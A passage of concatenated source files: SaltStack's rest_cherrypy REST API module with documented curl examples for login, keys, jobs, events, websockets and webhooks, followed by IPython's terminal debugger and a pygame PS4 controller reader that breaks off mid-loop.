HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
self._cp_config['tools.salt_token.on'] = True
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
def POST(self, mid, keysize=None, force=None, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
.. versionadded:: 2014.7.0
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
self._cp_config['tools.hypermedia_out.on'] = False
self._cp_config['tools.sessions.on'] = False
lowstate = [{
'client': 'wheel',
'fun': 'key.gen_accept',
'id_': mid,
}]
if keysize:
lowstate[0]['keysize'] = keysize
if force:
lowstate[0]['force'] = force
lowstate[0].update(kwargs)
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = StringIO.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(mid)
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
perms = eauth.get(token['name'], eauth.get('*'))
if perms is None:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
# Note, you must be authenticated!
var source = new EventSource('/events');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) {
console.debug('Tag: ', e.data.tag)
console.debug('Data: ', e.data.data)
};
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events', {withCredentials: true});
Some browser clients lack CORS support for the ``EventSource()`` API. Such
clients may instead pass the :mailheader:`X-Auth-Token` value as an URL
parameter:
.. code-block:: bash
curl -NsS localhost:8000/events/6d1b722e
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_sesion.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = stream.next()
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:**
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_sesion.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = stream.next()
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
foo=Foo&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
raw_body = cherrypy.serving.request.raw_body
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in self.url_map.items():
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.cors_tool.on': True,
},
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
debugger.py
|
import asyncio
import signal
import sys
import threading
from IPython.core.debugger import Pdb
from IPython.core.completer import IPCompleter
from .ptutils import IPythonPTCompleter
from .shortcuts import create_ipython_shortcuts, suspend_to_bg, cursor_in_leading_ws
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.filters import (Condition, has_focus, has_selection,
vi_insert_mode, emacs_insert_mode)
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.key_binding.bindings.completion import display_completions_like_readline
from pygments.token import Token
from prompt_toolkit.shortcuts.prompt import PromptSession
from prompt_toolkit.enums import EditingMode
from prompt_toolkit.formatted_text import PygmentsTokens
from prompt_toolkit import __version__ as ptk_version
PTK3 = ptk_version.startswith('3.')
class TerminalPdb(Pdb):
"""Standalone IPython debugger."""
def __init__(self, *args, pt_session_options=None, **kwargs):
Pdb.__init__(self, *args, **kwargs)
self._ptcomp = None
self.pt_init(pt_session_options)
def pt_init(self, pt_session_options=None):
"""Initialize the prompt session and the prompt loop
and store them in self.pt_app and self.pt_loop.
Additional keyword arguments for the PromptSession class
can be specified in pt_session_options.
"""
if pt_session_options is None:
pt_session_options = {}
def get_prompt_tokens():
return [(Token.Prompt, self.prompt)]
if self._ptcomp is None:
compl = IPCompleter(shell=self.shell,
namespace={},
global_namespace={},
parent=self.shell,
)
# add a completer for all the do_ methods
methods_names = [m[3:] for m in dir(self) if m.startswith("do_")]
def gen_comp(self, text):
return [m for m in methods_names if m.startswith(text)]
import types
newcomp = types.MethodType(gen_comp, compl)
compl.custom_matchers.insert(0, newcomp)
# end add completer.
self._ptcomp = IPythonPTCompleter(compl)
options = dict(
message=(lambda: PygmentsTokens(get_prompt_tokens())),
editing_mode=getattr(EditingMode, self.shell.editing_mode.upper()),
key_bindings=create_ipython_shortcuts(self.shell),
history=self.shell.debugger_history,
completer=self._ptcomp,
enable_history_search=True,
mouse_support=self.shell.mouse_support,
complete_style=self.shell.pt_complete_style,
style=self.shell.style,
color_depth=self.shell.color_depth,
)
if not PTK3:
options['inputhook'] = self.shell.inputhook
options.update(pt_session_options)
self.pt_loop = asyncio.new_event_loop()
self.pt_app = PromptSession(**options)
def cmdloop(self, intro=None):
"""Repeatedly issue a prompt, accept input, parse an initial prefix
off the received input, and dispatch to action methods, passing them
the remainder of the line as argument.
override the same methods from cmd.Cmd to provide prompt toolkit replacement.
"""
if not self.use_rawinput:
raise ValueError('Sorry ipdb does not support use_rawinput=False')
# In order to make sure that prompt, which uses asyncio doesn't
# interfere with applications in which it's used, we always run the
# prompt itself in a different thread (we can't start an event loop
# within an event loop). This new thread won't have any event loop
# running, and here we run our prompt-loop.
self.preloop()
try:
if intro is not None:
self.intro = intro
if self.intro:
self.stdout.write(str(self.intro)+"\n")
stop = None
while not stop:
if self.cmdqueue:
line = self.cmdqueue.pop(0)
else:
self._ptcomp.ipy_completer.namespace = self.curframe_locals
self._ptcomp.ipy_completer.global_namespace = self.curframe.f_globals
# Run the prompt in a different thread.
line = ''
keyboard_interrupt = False
def in_thread():
nonlocal line, keyboard_interrupt
try:
line = self.pt_app.prompt()
except EOFError:
line = 'EOF'
except KeyboardInterrupt:
keyboard_interrupt = True
th = threading.Thread(target=in_thread)
th.start()
th.join()
if keyboard_interrupt:
raise KeyboardInterrupt
line = self.precmd(line)
stop = self.onecmd(line)
stop = self.postcmd(stop, line)
self.postloop()
except Exception:
raise
def set_trace(frame=None):
"""
Start debugging from `frame`.
If frame is not specified, debugging starts from caller's frame.
"""
TerminalPdb().set_trace(frame or sys._getframe().f_back)
if __name__ == '__main__':
import pdb
# IPython.core.debugger.Pdb.trace_dispatch shall not catch
# bdb.BdbQuit. When started through __main__ and an exception
# happened after hitting "c", this is needed in order to
# be able to quit the debugging session (see #9950).
old_trace_dispatch = pdb.Pdb.trace_dispatch
pdb.Pdb = TerminalPdb
pdb.Pdb.trace_dispatch = old_trace_dispatch
pdb.main()
|
controller.py
|
# This file presents an interface for interacting with the Playstation 4 Controller
# in Python. Simply plug your PS4 controller into your computer using USB and run this
# script!
#
# NOTE: I assume in this script that the only joystick plugged in is the PS4 controller.
# if this is not the case, you will need to change the class accordingly.
import pygame
from threading import Thread
class PS4Controller:
"""Class representing the PS4 controller. Pretty straightforward functionality."""
def __init__(self):
"""Initialize the joystick components."""
pygame.init()
pygame.joystick.init()
self.controller = pygame.joystick.Joystick(0)
self.controller.init()
self.axis_data = False
self.button_data = False
self.hat_data = False
# initialize the variable used to indicate if
# the thread should be stopped
self.stopped = False
# Threading-method
def start(self):
# Start the thread to read signals from the controller
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next signal from the controller
if not self.axis_data:
self.axis_data = {0: 0.0, 1: 0.0, 2: 0.0,
3: -1.0, 4: -1.0, 5: 0.0} # default
if not self.button_data:
self.button_data = {}
for i in range(self.controller.get_numbuttons()):
self.button_data[i] = False
if not self.hat_data:
self.hat_data = {}
for i in range(self.controller.get_numhats()):
self.hat_data[i] = (0, 0)
for event in pygame.event.get():
if event.type == pygame.JOYAXISMOTION:
